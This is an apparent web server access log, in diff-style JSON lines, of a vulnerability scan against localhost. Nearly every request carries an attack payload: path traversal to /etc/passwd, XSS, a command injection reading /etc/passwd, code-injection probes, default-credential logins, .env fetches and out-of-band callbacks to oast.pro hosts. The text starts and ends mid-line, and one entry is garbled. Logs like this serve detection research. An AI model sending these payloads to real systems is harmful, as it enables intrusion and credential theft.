"http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"_charset_=utf-8&j_username=aparker@geometrixx.info&j_password=aparker&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /errors.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/53 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/29KBaI8G6914r3u46PeIjLQNuYz.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"{\x22action\x22:\x22SSLVPN_Resource\x22,\x22method\x22:\x22deleteImage\x22,\x22data\x22:[{\x22data\x22:[\x22/var/www/html/d.txt;cat /etc/passwd >/var/www/html/poc.txt\x22]}],\x22type\x22:\x22rpc\x22,\x22tid\x22:17,\x22f8839p7rqtj\x22:\x22=\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /directdata/direct/router HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_all_dbs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms9.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi2/status.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sample.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /database/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/54 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /control/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=skatubazar_option HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /poc.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /a.htaccess HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/55 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /resin-doc/viewfile/?file=/WEB-INF/resin-web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:32:55 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow>\x0D\x0A ]>\x0D\x0A\x0D\x0AJohn\x0D\x0A&ent;\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/api/product/manger/getInfo HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"\x0D\x0A\x0D\x0Apingback.ping\x0D\x0A\x0D\x0A\x0D\x0Ahttp://ca28bc0smpvbbtig07h0468jqfh6d6aa8.oast.pro\x0D\x0A\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xmlrpc/pingback HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html?lang=en HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /owa/auth/logon.aspx?replaceCurrent=1&url=http://127.0.0.1/ecp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://ca28bc0smpvbbtig07h0bsh4yb4a7urf8.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"httpd;General;lang=en&login_id=root&login_pw=sweap12~","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /main.ehp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /account/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:35:56 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm 